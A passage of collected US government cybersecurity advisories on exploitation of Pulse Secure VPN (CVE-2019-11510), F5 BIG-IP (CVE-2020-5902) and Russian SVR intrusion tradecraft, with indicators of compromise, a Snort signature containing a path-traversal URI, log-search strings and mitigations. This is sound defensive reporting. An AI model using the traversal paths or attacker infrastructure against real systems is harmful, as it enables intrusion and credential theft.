_[[T1003]](<https://attack.mitre.org/versions/v7/techniques/T1003>) a user password from the VPN appliance. To do this, CISA created a _user realm _(Pulse Secure configuration terminology) and configured its roles/resource groups to allow for Remote Desktop Protocol (RDP) over HTML5 (Apache Guacamole). After using the new user to remotely access an internal workstation over RDP, CISA used a crafted request (see figure 4) to leak the credentials from the device. (**Note:** the path to stored credentials is publicly available.)[[10]](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>)\n\n\n\n##### Figure 4: Exploitation of the VPN appliance leading to plaintext user credentials\n\nThis test confirmed CISA\u2019s suspicion that threat actors had access to each of the various compromised environments.\n\n### Cyber Threat Actor Behavior in Victim Network Environments\n\nCISA observed\u2014once credentials were compromised\u2014cyber threat actors accessing victim network environments via the Pulse Secure VPN appliances. Cyber threat actors used _Connection Proxies _[[T1090 ]](<https://attack.mitre.org/versions/v7/techniques/T1090>)\u2014such as Tor infrastructure and virtual private servers (VPSs)\u2014to minimize the chance of detection when they connected to victim VPN appliances.\n\nUsing traditional host-based analysis, CISA identified the following malicious cyber actor actions occurring in a victim\u2019s environment:\n\n * Creating persistence via scheduled tasks/remote access trojans\n * Amassing files for exfiltration\n * Executing ransomware on the victim\u2019s network environment\n\nBy correlating these actions with the connection times and user accounts recorded in the victim\u2019s Pulse Secure `.access` logs, CISA was able to identify unauthorized threat actor connections to the victim\u2019s network environment. CISA was then able to use these Internet Protocol (IP) addresses and user-agents to identify unauthorized connections to the network environments of other victims. Refer to the Indicators of Compromise section for the IP addresses CISA observed making these unauthorized connections.\n\nIn one case, CISA observed a cyber threat actor attempting to sell the stolen credentials after 30 unsuccessful attempts to connect to the customer environment to escalate privileges and drop ransomware. CISA has also observed this threat actor successfully dropping ransomware at hospitals and U.S. Government entities.\n\nIn other cases, CISA observed threat actors leveraging tools, such as LogMeIn and TeamViewer, for persistence. These tools would enable threat actors to maintain access to the victim\u2019s network environment if they lost their primary connection.\n\n### Initial Detection\n\nConventional antivirus and endpoint detection and response solutions did not detect this type of activity because the threat actors used legitimate credentials and remote services. \n\nAn intrusion detection system may have noticed the exploitation of CVE-2019-11510 if the sensor had visibility to the external interface of the VPN appliance (possible in a customer\u2019s demilitarized zone) and if appropriate rules were in place. Heuristics in centralized logging may have been able to detect logins from suspicious or foreign IPs, if configured.\n\n### Post-Compromise Detection and IOC Detection Tool\n\nGiven that organizations that have applied patches for CVE-2019-11510 may still be at risk for exploitation from compromises that occurred pre-patch, CISA developed detection methods for organizations to determine if their patched VPN appliances have been targeted by the activity revealed in this report.\n\nTo detect past exploitation of CVE-2019-11510, network administrators should:\n\n 1. Turn on unauthenticated log requests (see figure 5). (**Note:** there is a risk of overwriting logs with unauthenticated requests so, if enabling this feature, be sure to frequently back up logs; if possible, use a remote syslog server.) \n\n\n\n##### Figure 5: Checkbox that enables logging exploit attacks\n\n 2. Check logs for exploit attempts. To detect lateral movement, system administrators should look in the logs for strings such as` ../../../data `(see figure 6). \n\n\n\n##### Figure 6: Strings for detection of lateral movement\n\n 3. Manually review logs for unauthorized sessions and exploit attempts, especially sessions originating from unexpected geo-locations.\n 4. Run CISA\u2019s IOC detection tool. CISA developed a tool that enables administrators to triage logs (if authenticated request logging is turned on) and automatically search for IOCs associated with exploitation of CVE-2019-11510. CISA encourages administrators to visit [CISA\u2019s GitHub page](<https://github.com/cisagov/check-your-pulse>) to download and run the tool. While not exhaustive, this tool may find evidence of attempted compromise.\n\n### Indicators of Compromise\n\nCISA observed IP addresses making unauthorized connections to customer infrastructure. (**Note:** these IPs were observed as recently as February 15, 2020.) The IP addresses seen making unauthorized connections to customer infrastructure were different than IP addresses observed during initial exploitation. Please see the STIX file below for IPs.\n\nCISA observed the following user agents with this activity:\n\n * Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0\n * Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\n * Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55[.]0.2883.87 Safari/537.36\n\nCISA also observed:\n\n * A cyber threat actor renaming portable executable (PE) files in an attempt to subvert application allow listing or antivirus (AV) protections. See table 1 for hashes of files used.\n * A threat actor \u201cliving off the land\u201d and utilizing C:\\Python\\ArcGIS to house malicious PE files, as well as using natively installed Python.\n * A threat actor attack infrastructure: 38.68.36(dot)112 port 9090 and 8088\n\n##### Table 1: Filenames and hashes of files used by a threat actor\n\nFilename | MD5 \n---|--- \nt.py (tied to scheduled task, python meterpreter reverse shell port 9090) | 5669b1fa6bd8082ffe306aa6e597d7f5 \ng.py (tied to scheduled task, python meterpreter reverse shell port 8088) | 61eebf58e892038db22a4d7c2ee65579 \n \nFor a downloadable copy of IOCs, see STIX file.\n\n### Mitigations\n\nCISA strongly urges organizations that have not yet done so to upgrade their Pulse Secure VPN to the corresponding patches for CVE-2019-11510. If\u2014after applying the detection measures in this alert\u2014organizations detect evidence of CVE-2019-11510 exploitation, CISA recommends changing passwords for all Active Directory accounts, including administrators and services accounts.\n\nCISA also recommends organizations to:\n\n * Look for unauthorized applications and scheduled tasks in their environment.\n * Remove any remote access programs not approved by the organization.\n * Remove any remote access trojans.\n * Carefully inspect scheduled tasks for scripts or executables that may allow an attacker to connect to an environment.\n\nIf organizations find evidence of malicious, suspicious, or anomalous activity or files, they should consider reimaging the workstation or server and redeploying back into the environment. CISA recommends performing checks to ensure the infection is gone even if the workstation or host has been reimaged.\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at\n\n * Phone: (888) 282-0870\n * Email: [CISAServiceDesk@cisa.dhs.gov](<mailto:CISAServiceDesk@cisa.dhs.gov>)\n\n### References\n\n[[1] Pulse Secure Advisory SA44101 ](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)\n\n[[2] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)\n\n[[3] Twitter. @XMPPwocky. (2019, August 23). Your least favorite construct ](<https://twitter.com/XMPPwocky/status/1164874297690611713/photo/1>)\n\n[[4] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848>)\n\n[[5] GitHub. BishopFox / pwn-pulse. ](<https://github.com/BishopFox/pwn-pulse/blob/master/pwn-pulse.sh>)\n\n[[6] File disclosure in Pulse Secure SSL VPN (Metasploit) ](<https://www.exploit-db.com/exploits/47297>)\n\n[[7] Twitter. @alyssa_herra ](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>)\n\n[[8] OpenSecurity Forums. Public vulnerability discussion. (2019, August 23). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?do=findComment&comment=848>)\n\n[[9] OpenSecurity Forums. Public vulnerability discussion. (2019, August 31). ](<https://opensecurity.global/forums/topic/184-pulse-secure-ssl-vpn-vulnerability-being-exploited-in-wild/?tab=comments#comment-887>)\n\n[[10] Twitter. @alyssa_herra](<https://twitter.com/alyssa_herrera_/status/1164089995193225216?s=11>)\n\n### Revisions\n\nApril 16, 2020: Initial Version|October 23, 2020\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-10-24T12:00:00", "type": "ics", "title": "Continued Threat Actor Exploitation Post Pulse Secure VPN Patching", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2023-27350"], "modified": "2020-10-24T12:00:00", "id": "AA20-107A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-107a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:34:19", "description": "### Summary\n\nUnpatched Pulse Secure VPN servers continue to be an attractive target for malicious actors. Affected organizations that have not applied the software patch to fix an arbitrary file reading vulnerability, known as CVE-2019-11510, can become compromised in an attack. [[1]](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nAlthough Pulse Secure [[2]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) disclosed the vulnerability and provided software patches for the various affected products in April 2019, the Cybersecurity and Infrastructure Security Agency (CISA) continues to observe wide exploitation of CVE-2019-11510. [[3]](<https://www.kb.cert.org/vuls/id/927237/ >) [[4]](<https://www.us-cert.gov/ncas/current-activity/2019/07/26/vulnerabilities-multiple-vpn-applications >) [[5]](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>)\n\nCISA expects to see continued attacks exploiting unpatched Pulse Secure VPN environments and strongly urges users and administrators to upgrade to the corresponding fixes. [[6]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n## Timelines of Specific Events\n\n * April 24, 2019 \u2013 Pulse Secure releases initial advisory and software updates addressing multiple vulnerabilities.\n * May 28, 2019 \u2013 Large commercial vendors get reports of vulnerable VPN through HackerOne.\n * July 31, 2019 \u2013 Full use of exploit demonstrated using the admin session hash to get complete shell.\n * August 8, 2019 \u2013 Meh Chang and Orange Tsai demonstrate the VPN issues across multiple vendors (Pulse Secure) with detailed attack on active VPN exploitation.\n * August 24, 2019 \u2013 Bad Packets identifies over 14,500 vulnerable VPN servers globally still unpatched and in need of an upgrade.\n * October 7, 2019 \u2013 The National Security Agency (NSA) produces a Cybersecurity Advisory on Pulse Secure and other VPN products being targeted actively by advanced persistent threat actors.\n * October 16, 2019 \u2013 The CERT Coordination Center (CERT/CC) releases Vulnerability Note VU#927237: Pulse Secure VPN contains multiple vulnerabilities.\n * January 2020 \u2013 Media reports cybercriminals now targeting unpatched Pulse Secure VPN servers to install REvil (Sodinokibi) ransomware. \n\n### Technical Details\n\n## Impact\n\nA remote, unauthenticated attacker may be able to compromise a vulnerable VPN server. The attacker may be able to gain access to all active users and their plain-text credentials. It may also be possible for the attacker to execute arbitrary commands on each VPN client as it successfully connects to the VPN server.\n\nAffected versions:\n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3\n * Pulse Connect Secure 8.3R1 - 8.3R7\n * Pulse Connect Secure 8.2R1 - 8.2R12\n * Pulse Connect Secure 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1\n * Pulse Policy Secure 5.4R1 - 5.4R7\n * Pulse Policy Secure 5.3R1 - 5.3R12\n * Pulse Policy Secure 5.2R1 - 5.2R12\n * Pulse Policy Secure 5.1R1 - 5.1R15\n\n### Mitigations\n\nThis vulnerability has no viable workarounds except for applying the patches provided by the vendor and performing required system updates.\n\nCISA strongly urges users and administrators to upgrade to the corresponding fixes. [[7]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n### References\n\n[[1] NIST NVD CVE-2019-11510 ](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n[[2] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n[[3] CERT/CC Vulnerability Note VU#927237](<https://www.kb.cert.org/vuls/id/927237/>)\n\n[[4] CISA Current Activity Vulnerabilities in Multiple VPN Applications ](<https://www.us-cert.gov/ncas/current-activity/2019/07/26/vulnerabilities-multiple-vpn-applications>)\n\n[[5] CISA Current Activity Multiple Vulnerabilities in Pulse Secure VPN](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>)\n\n[[6] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n[[7] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n### Revisions\n\nJanuary 10, 2020: Initial Version|April 15, 2020: Revised to correct type of vulnerability\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-15T12:00:00", "type": "ics", "title": "Continued Exploitation of Pulse Secure VPN Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2023-27350"], "modified": "2020-04-15T12:00:00", "id": "AA20-010A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:32:02", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is issuing this alert in response to recently disclosed exploits that target F5 BIG-IP devices that are vulnerable to CVE-2020-5902. F5 Networks, Inc. (F5) released a patch for CVE-2020-5902 on June 30, 2020.[[1]](<https://support.f5.com/csp/article/K52145254>) Unpatched F5 BIG-IP devices are an attractive target for malicious actors. Affected organizations that have not applied the patch to fix this critical remote code execution (RCE) vulnerability risk an attacker exploiting CVE-2020-5902 to take control of their system. **Note:** F5\u2019s security advisory for CVE-2020-5902 states that there is a high probability that any remaining unpatched devices are likely already compromised.\n\nCISA expects to see continued attacks exploiting unpatched F5 BIG-IP devices and strongly urges users and administrators to upgrade their software to the fixed versions. CISA also advises that administrators deploy the signature included in this Alert to help them determine whether their systems have been compromised.\n\nThis Alert also provides additional detection measures and mitigations for victim organizations to help recover from attacks resulting from CVE-2020-5902. CISA encourages administrators to remain aware of the ramifications of exploitation and to use the recommendations in this alert to help secure their organization\u2019s systems against attack.\n\n### Background\n\nCISA has conducted incident response engagements at U.S. Government and commercial entities where malicious cyber threat actors have exploited CVE-2020-5902\u2014an RCE vulnerability in the BIG-IP Traffic Management User Interface (TMUI)\u2014to take control of victim systems. On June 30, F5 disclosed CVE-2020-5902, stating that it allows attackers to, \u201cexecute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.\u201d\n\nOn July 4, open-source reporting indicated a proof-of-concept code was available and threat actors were exploiting the vulnerability by attempting to steal credentials. On July 5, security researchers posted exploits that would allow threat actors to exfiltrate data or execute commands on vulnerable devices. The risk posed by the vulnerability is critical.\n\n### Technical Details\n\nCISA has observed scanning and reconnaissance, as well as confirmed compromises, within a few days of F5\u2019s patch release for this vulnerability. As early as July 6, 2020, CISA has seen broad scanning activity for the presence of this vulnerability across federal departments and agencies\u2014this activity is currently occurring as of the publication of this Alert.\n\nCISA has been working with several entities across multiple sectors to investigate potential compromises relating to this vulnerability. CISA has confirmed two compromises and is continuing to investigate. CISA will update this Alert with any additional actionable information.\n\n### Detection Methods\n\nCISA recommends administrators see the F5 Security Advisory K52145254 for indicators of compromise and F5\u2019s CVE-2020-5902 IoC Detection Tool.[[2]](<https://support.f5.com/csp/article/K52145254>) CISA also recommends organizations complete the following actions in conducting their hunt for this exploit:\n\n * Quarantine or take offline potentially affected systems\n * Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections\n * Deploy the following CISA-created Snort signature to detect malicious activity: \n\n`alert tcp any any -> any $HTTP_PORTS (msg:\"BIG-IP:HTTP URI GET contains '/tmui/login.jsp/..|3b|/tmui/':CVE-2020-5902\"; sid:1; rev:1; flow:established,to_server; content:\"/tmui/login.jsp/..|3b|/tmui/\"; http_uri; fast_pattern:only; content:\"GET\"; nocase; http_method; priority:2; reference:url,github.com/yassineaboukir/CVE-2020-5902; reference:cve,2020-5902; metadata:service http;)`\n\n### Mitigations\n\nCISA strongly urges organizations that have not yet done so to upgrade their BIG-IP software to the corresponding patches for CVE-2020-5902. If organizations detect evidence of CVE-2020-5902 exploitation after patching and applying the detection measures in this alert, CISA recommends taking immediate action to reconstitute affected systems.\n\nShould an organization\u2019s IT security personnel discover system compromise, CISA recommends they:\n\n * Reimage compromised hosts\n * Provision new account credentials\n * Limit access to the management interface to the fullest extent possible\n * Implement network segmentation \n * **Note: **network segmentation is a very effective security mechanism to help prevent an intruder from propagating exploits or laterally moving within an internal network. Segregation separates network segments based on role and functionality. A securely segregated network can limit the spread of malicious occurrences, reducing the impact from intruders that gain a foothold somewhere inside the network.\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at\n\n * Phone: (888) 282-0870\n * Email: [CISAServiceDesk@cisa.dhs.gov](<mailto: CISAServiceDesk@cisa.dhs.gov>)\n\n### References\n\n[[1] F5 Security Advisory K52145254 ](<https://support.f5.com/csp/article/K52145254>)\n\n[[2] F5 Security Advisory K52145254 ](<https://support.f5.com/csp/article/K52145254>)\n\n[CISA Factsheet: Guidance for F5 BIG-IP TMUI Vulnerability (CVE-2020-5902)](<https://www.cisa.gov/publication/guidance-f5-big-ip-vulnerability-fact-sheet>)\n\n### Revisions\n\nJuly 24, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-24T12:00:00", "type": "ics", "title": "Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902", "CVE-2023-27350"], "modified": "2020-07-24T12:00:00", "id": "AA20-206A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-206a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-02T15:04:38", "description": "### Summary\n\nThe Federal Bureau of Investigation (FBI), Department of Homeland Security (DHS), and Cybersecurity and Infrastructure Security Agency (CISA) assess Russian Foreign Intelligence Service (SVR) cyber actors\u2014also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and Yttrium\u2014will continue to seek intelligence from U.S. and foreign entities through cyber exploitation, using a range of initial exploitation techniques that vary in sophistication, coupled with stealthy intrusion tradecraft within compromised networks. The SVR primarily targets government networks, think tank and policy analysis organizations, and information technology companies. On April 15, 2021, the White House released a statement on the recent SolarWinds compromise, attributing the activity to the SVR. For additional detailed information on identified vulnerabilities and mitigations, see the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and FBI Cybersecurity Advisory titled \u201cRussian SVR Targets U.S. and Allied Networks,\u201d released on April 15, 2021.\n\nThe FBI and DHS are providing information on the SVR\u2019s cyber tools, targets, techniques, and capabilities to aid organizations in conducting their own investigations and securing their networks.\n\nClick here for a PDF version of this report.\n\n### Threat Overview\n\nSVR cyber operations have posed a longstanding threat to the United States. Prior to 2018, several private cyber security companies published reports about APT 29 operations to obtain access to victim networks and steal information, highlighting the use of customized tools to maximize stealth inside victim networks and APT 29 actors\u2019 ability to move within victim environments undetected.\n\nBeginning in 2018, the FBI observed the SVR shift from using malware on victim networks to targeting cloud resources, particularly e-mail, to obtain information. The exploitation of Microsoft Office 365 environments following network access gained through use of modified SolarWinds software reflects this continuing trend. Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations.\n\n### Technical Details\n\n### SVR Cyber Operations Tactics, Techniques, and Procedures\n\n### Password Spraying\n\nIn one 2018 compromise of a large network, SVR cyber actors used password spraying to identify a weak password associated with an administrative account. The actors conducted the password spraying activity in a \u201clow and slow\u201d manner, attempting a small number of passwords at infrequent intervals, possibly to avoid detection. The password spraying used a large number of IP addresses all located in the same country as the victim, including those associated with residential, commercial, mobile, and The Onion Router (TOR) addresses.\n\nThe organization unintentionally exempted the compromised administrator\u2019s account from multi-factor authentication requirements. With access to the administrative account, the actors modified permissions of specific e-mail accounts on the network, allowing any authenticated network user to read those accounts.\n\nThe actors also used the misconfiguration for compromised non-administrative accounts. That misconfiguration enabled logins using legacy single-factor authentication on devices which did not support multi-factor authentication. The FBI suspects this was achieved by spoofing user agent strings to appear to be older versions of mail clients, including Apple\u2019s mail client and old versions of Microsoft Outlook. After logging in as a non-administrative user, the actors used the permission changes applied by the compromised administrative user to access specific mailboxes of interest within the victim organization.\n\nWhile the password sprays were conducted from many different IP addresses, once the actors obtained access to an account, that compromised account was generally only accessed from a single IP address corresponding to a leased virtual private server (VPS). The FBI observed minimal overlap between the VPSs used for different compromised accounts, and each leased server used to conduct follow-on actions was in the same country as the victim organization.\n\nDuring the period of their access, the actors consistently logged into the administrative account to modify account permissions, including removing their access to accounts presumed to no longer be of interest, or adding permissions to additional accounts. \n\n#### _**Recommendations**_\n\nTo defend from this technique, the FBI and DHS recommend network operators to follow best practices for configuring access to cloud computing environments, including:\n\n * Mandatory use of an approved multi-factor authentication solution for all users from both on premises and remote locations.\n * Prohibit remote access to administrative functions and resources from IP addresses and systems not owned by the organization.\n * Regular audits of mailbox settings, account permissions, and mail forwarding rules for evidence of unauthorized changes.\n * Where possible, enforce the use of strong passwords and prevent the use of easily guessed or commonly used passwords through technical means, especially for administrative accounts.\n * Regularly review the organization\u2019s password management program.\n * Ensure the organization\u2019s information technology (IT) support team has well-documented standard operating procedures for password resets of user account lockouts.\n * Maintain a regular cadence of security awareness training for all company employees.\n\n### Leveraging Zero-Day Vulnerability\n\nIn a separate incident, SVR actors used CVE-2019-19781, a zero-day exploit at the time, against a virtual private network (VPN) appliance to obtain network access. Following exploitation of the device in a way that exposed user credentials, the actors identified and authenticated to systems on the network using the exposed credentials.\n\nThe actors worked to establish a foothold on several different systems that were not configured to require multi-factor authentication and attempted to access web-based resources in specific areas of the network in line with information of interest to a foreign intelligence service.\n\nFollowing initial discovery, the victim attempted to evict the actors. However, the victim had not identified the initial point of access, and the actors used the same VPN appliance vulnerability to regain access. Eventually, the initial access point was identified, removed from the network, and the actors were evicted. As in the previous case, the actors used dedicated VPSs located in the same country as the victim, probably to make it appear that the network traffic was not anomalous with normal activity.\n\n#### **_Recommendations_**\n\nTo defend from this technique, the FBI and DHS recommend network defenders ensure endpoint monitoring solutions are configured to identify evidence of lateral movement within the network and:\n\n * Monitor the network for evidence of encoded PowerShell commands and execution of network scanning tools, such as NMAP.\n * Ensure host based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time.\n * Require use of multi-factor authentication to access internal systems.\n * Immediately configure newly-added systems to the network, including those used for testing or development work, to follow the organization\u2019s security baseline and incorporate into enterprise monitoring tools.\n\n### WELLMESS Malware\n\nIn 2020, the governments of the United Kingdom, Canada, and the United States attributed intrusions perpetrated using malware known as WELLMESS to APT 29. WELLMESS was written in the Go programming language, and the previously-identified activity appeared to focus on targeting COVID-19 vaccine development. The FBI\u2019s investigation revealed that following initial compromise of a network\u2014normally through an unpatched, publicly-known vulnerability\u2014the actors deployed WELLMESS. Once on the network, the actors targeted each organization\u2019s vaccine research repository and Active Directory servers. These intrusions, which mostly relied on targeting on-premises network resources, were a departure from historic tradecraft, and likely indicate new ways the actors are evolving in the virtual environment. More information about the specifics of the malware used in this intrusion have been previously released and are referenced in the \u2018Resources\u2019 section of this document.\n\n### Tradecraft Similarities of SolarWinds-enabled Intrusions\n\nDuring the spring and summer of 2020, using modified SolarWinds network monitoring software as an initial intrusion vector, SVR cyber operators began to expand their access to numerous networks. The SVR\u2019s modification and use of trusted SolarWinds products as an intrusion vector is also a notable departure from the SVR\u2019s historic tradecraft.\n\nThe FBI\u2019s initial findings indicate similar post-infection tradecraft with other SVR-sponsored intrusions, including how the actors purchased and managed infrastructure used in the intrusions. After obtaining access to victim networks, SVR cyber actors moved through the networks to obtain access to e-mail accounts. Targeted accounts at multiple victim organizations included accounts associated with IT staff. The FBI suspects the actors monitored IT staff to collect useful information about the victim networks, determine if victims had detected the intrusions, and evade eviction actions.\n\n#### **_Recommendations_**\n\nAlthough defending a network from a compromise of trusted software is difficult, some organizations successfully detected and prevented follow-on exploitation activity from the initial malicious SolarWinds software. This was achieved using a variety of monitoring techniques including:\n\n * Auditing log files to identify attempts to access privileged certificates and creation of fake identify providers.\n * Deploying software to identify suspicious behavior on systems, including the execution of encoded PowerShell.\n * Deploying endpoint protection systems with the ability to monitor for behavioral indicators of compromise.\n * Using available public resources to identify credential abuse within cloud environments.\n * Configuring authentication mechanisms to confirm certain user activities on systems, including registering new devices.\n\nWhile few victim organizations were able to identify the initial access vector as SolarWinds software, some were able to correlate different alerts to identify unauthorized activity. The FBI and DHS believe those indicators, coupled with stronger network segmentation (particularly \u201czero trust\u201d architectures or limited trust between identity providers) and log correlation, can enable network defenders to identify suspicious activity requiring additional investigation.\n\n### General Tradecraft Observations\n\nSVR cyber operators are capable adversaries. In addition to the techniques described above, FBI investigations have revealed infrastructure used in the intrusions is frequently obtained using false identities and cryptocurrencies. VPS infrastructure is often procured from a network of VPS resellers. These false identities are usually supported by low reputation infrastructure including temporary e-mail accounts and temporary voice over internet protocol (VoIP) telephone numbers. While not exclusively used by SVR cyber actors, a number of SVR cyber personas use e-mail services hosted on cock[.]li or related domains.\n\nThe FBI also notes SVR cyber operators have used open source or commercially available tools continuously, including Mimikatz\u2014an open source credential-dumping too\u2014and Cobalt Strike\u2014a commercially available exploitation tool.\n\n### Mitigations\n\nThe FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services.\n\n### Resources\n\n * NSA, CISA, FBI [Joint Cybersecurity Advisory: Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)\n * CISA: [Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise ](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>)\n * CISA [Alert AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)\n * FBI, CISA, ODNI, NSA Joint Statement: [Joint Statement by the Federal Bureau of Investigation, the Cybersecurity and Infrastructure Security Agency, the Office of the Director of National Intelligence (ODNI), and the National Security Agency](<https://www.odni.gov/index.php/newsroom/press-releases/press-releases-2021/item/2176-joint-statement-by-the-federal-bureau-of-investigation-fbi-the-cybersecurity-and-infrastructure-security-agency-cisa-the-office-of-the-director-of-national-intelligence-odni-and-the-national-security-agency-nsa>)\n * CISA Alert [AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>)\n * [CISA Insights: What Every Leader Needs to Know about the Ongoing APT Cyber Activity](<https://www.cisa.gov/sites/default/files/publications/CISA Insights - What Every Leader Needs to Know About the Ongoing APT Cyber Activity - FINAL_508.pdf>)\n * FBI, CISA [Joint Cybersecurity Advisory: Advanced Persistent Threat Actors Targeting U.S. Think Tanks](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-336A-APT_Actors_Targeting_US_ThinkTanks.pdf>)\n * CISA: [Malicious Activity Targeting COVID-19 Research, Vaccine Development ](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/16/malicious-activity-targeting-covid-19-research-vaccine-development>)\n * NCSC, CSE, NSA, CISA Advisory: [APT 29 targets COVID-19 vaccine development](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)\n\n### 